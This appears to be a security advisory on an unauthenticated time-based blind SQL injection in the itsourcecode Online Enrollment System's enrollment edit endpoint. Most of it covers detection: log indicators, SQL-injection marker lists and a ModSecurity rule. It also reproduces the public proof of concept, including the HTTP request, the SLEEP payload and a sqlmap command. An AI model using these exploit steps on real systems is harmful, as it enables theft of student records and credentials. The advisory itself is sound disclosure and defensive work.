Introduction
An unauthenticated SQL injection in the itsourcecode Online Enrollment System allows remote attackers to extract database contents through a publicly documented, trivially reproducible attack against the enrollment edit function. With a public proof of concept already circulating and no vendor patch on the horizon, this is a vulnerability that demands immediate compensating controls from any organization running this software.
Itsourcecode is a platform that distributes free source code projects and programming tutorials for developers learning PHP, Java, Python, and other languages. The Online Student Enrollment System is one of their free PHP and MySQL projects. While not a commercial product with enterprise adoption, these types of open source educational projects frequently end up deployed in small institutional environments, making vulnerabilities in them relevant to the broader web application security landscape.
Technical Information
CVE-2026-5334 is a SQL injection vulnerability rooted in the complete absence of input sanitization on the deptid POST parameter within the enrollment module of the Online Enrollment System 1.0. The weakness is classified under both CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) and CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component). The CVSS v3.1 base score is 7.3, placing it in the High severity range, with impact across confidentiality, integrity, and availability.
Vulnerable Endpoints and Parameters
The attack surface involves two HTTP paths that work together. The enrollment edit form is rendered by the following URL:
/sms/enrollment/index.php?view=edit&id=3
When the form is submitted, the data is sent via POST to:
/sms/enrollment/controller.php?action=edit
The POST body includes four parameters: deptid, deptname, deptdesc, and save. The deptid parameter value is passed unsanitized into a backend SQL query, creating the injection point. No authentication or session validation is required to reach this endpoint.
Injection Technique
The disclosed attack uses time-based blind SQL injection, a technique where the attacker injects a SLEEP() function call into the query. If the injected SQL executes successfully, the database delays its response by the specified number of seconds. By observing whether the HTTP response is delayed, the attacker can infer boolean conditions about the database contents and extract data character by character.
The payload structure targets MySQL versions 5.0.12 and above:
deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX)&deptname=111&deptdesc=111&save=
This technique is stealthier than error-based or union-based injection because no data appears directly in the HTTP response body. However, it produces a distinctive pattern of delayed responses that is detectable through log analysis and database monitoring.
Systemic Codebase Weakness
This is not an isolated flaw. A sibling vulnerability, CVE-2026-4842, affects the identical deptid parameter in a different module at /sms/grades/index.php?view=edit&id=1. The recurrence of the same unsafe pattern across multiple endpoints strongly suggests the application lacks any centralized input validation or query parameterization, meaning additional undisclosed injection points may exist throughout the codebase.
Proof of Concept
A public proof of concept was disclosed on March 16, 2026, via a GitHub issue by the user yihaofuweng. VulDB confirmed the PoC under advisory VDB-354668.
The PoC provides a complete HTTP request that can be saved to a file (e.g., 1.txt) and fed directly to sqlmap:
POST /sms/enrollment/controller.php?action=edit HTTP/1.1 Host: 192.168.60.130 Content-Length: 40 Cache-Control: max-age=0 Origin: http://192.168.60.130 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.60.130/sms/enrollment/index.php?view=edit&id=3 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=9e304gniduc5qik7l8kks3bs21 Connection: keep-alive deptid=3&deptname=111&deptdesc=111&save=
Exploitation is then as simple as:
sqlmap -r 1.txt --batch
The confirmed injection parameter and payload:
Parameter: deptid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: deptid=3 AND (SELECT 2692 FROM (SELECT(SLEEP(5)))WDuX)&deptname=111&deptdesc=111&save=
No login or authorization is required to reach the vulnerable endpoint. Once sqlmap confirms the injection, an attacker can enumerate database names, table schemas, and extract sensitive data such as student records and credentials stored in the MySQL backend.
Detection Methods
No pre-published YARA, Sigma, or Snort rules specific to CVE-2026-5334 have been identified at the time of writing. However, multiple public sources provide actionable indicators that defenders can use to detect exploitation attempts.
Web Server Log Monitoring
The most immediately accessible detection point is web server access logs. Because time-based blind injection requires many sequential requests to extract data character by character, automated tooling like sqlmap generates a distinctive burst pattern. Defenders should look for:
- Clusters of POST requests to
/sms/enrollment/controller.php?action=editfrom the same source IP in rapid succession - Correlation with the
Refererheader valuehttp://<host>/sms/enrollment/index.php?view=edit&id=3, which appears in the disclosed PoC - A high frequency, machine-like cadence of requests that differs from normal human interaction with the enrollment edit form
SQL Injection Payload Indicators in Request Bodies
If your infrastructure supports POST body inspection (via WAF, reverse proxy, or application logging), alert on the presence of these SQL syntax fragments within parameters directed at the enrollment endpoints:
SLEEP(: the core time delay function used for blind extractionSELECT ... FROM (SELECT: nested subquery patterns typical of injection payloads- Standard SQL injection markers: single quotes (
'), comment sequences (--,#),UNION SELECT,OR 1=1, andAND 1=1
WAF Detection Rule
For organizations running ModSecurity or a compatible WAF, the following rule targets the specific vulnerable parameter. This rule was documented in analysis of the sibling vulnerability CVE-2026-4842, which exploits the identical deptid parameter in the same product:
SecRule ARGS:deptid "@detectSQLi" \
"id:1001,\
phase:2,\
deny,\
status:403,\
msg:'SQL Injection attempt detected in deptid parameter',\
log,\
auditlog"
This rule fires during phase 2 (request body analysis), which is critical since the injection is delivered via POST. The @detectSQLi operator leverages ModSecurity's built-in SQL injection detection logic against the specific deptid argument.
Database Level Detection
Monitoring MySQL query logs provides a deeper detection signal. Look for:
- Queries originating from the web application's database user that contain unexpected
SLEEP()calls,BENCHMARK()functions, or nestedSELECTsubqueries - Unusual
UNION SELECTstatements or queries returninginformation_schematables, indicating database structure enumeration - Abnormal query execution times: if queries to the enrollment tables suddenly start taking 5 or more seconds (matching the
SLEEP(5)in the PoC), this is a strong behavioral indicator of active exploitation
Error Response Correlation
A spike in HTTP 500 errors, SQL syntax errors, or ORM exceptions returned from /sms/enrollment/controller.php originating from the same source IP is a reliable early warning indicator that someone is probing for the vulnerability. Correlating web server error responses with the access patterns described above strengthens detection confidence.
MITRE ATT&CK Mapping
VulDB's CTI analysis maps this vulnerability to MITRE ATT&CK technique T1505 (Server Software Component) with CAPEC-108 (Command Line Injection). The file path /enrollment/index.php?view=edit&id=3 is listed as a verified Indicator of Attack at high confidence.
Affected Systems and Versions
- Product: itsourcecode Online Enrollment System
- Version: 1.0 (the only known version; no updates have been recorded on the project page)
- Technology stack: PHP and MySQL
- Vulnerable component: Parameter Handler in the enrollment edit module
- Vulnerable endpoints:
/sms/enrollment/index.php?view=edit&id=3(form rendering) and/sms/enrollment/controller.php?action=edit(form processing) - Vulnerable parameter:
deptid(POST)
Vendor Security History
The itsourcecode Online Enrollment System has multiple SQL injection vulnerabilities documented in its codebase. In addition to CVE-2026-5334, the sibling vulnerability CVE-2026-4842 affects the same deptid parameter in the grades module at /sms/grades/index.php?view=edit&id=1. The recurrence of the same vulnerability pattern across different modules indicates a systemic lack of secure coding practices throughout the application. The project page on itsourcecode.com shows zero updates, and the platform does not maintain a security advisory or disclosure process.
References
- CVE-2026-5334 Detail, National Vulnerability Database
- VulDB Advisory VDB-354668: itsourcecode Online Enrollment System Parameter index.php SQL Injection
- VulDB CTI Analysis for CVE-2026-5334
- VulDB Submission #781119
- GitHub PoC: itsourcecode Online Enrollment System V1.0 SQL Injection (yuji0903/silver-guide issue #15)
- RedPacket Security Advisory: CVE-2026-5334
- SentinelOne Vulnerability Database: CVE-2026-4842 (sibling vulnerability)
- Tenable CVE-2026-5334
- Tenable CVE-2026-4842
- Feedly CVE-2026-5334 Tracking
- itsourcecode.com
- itsourcecode Online Student Enrollment System Project Page
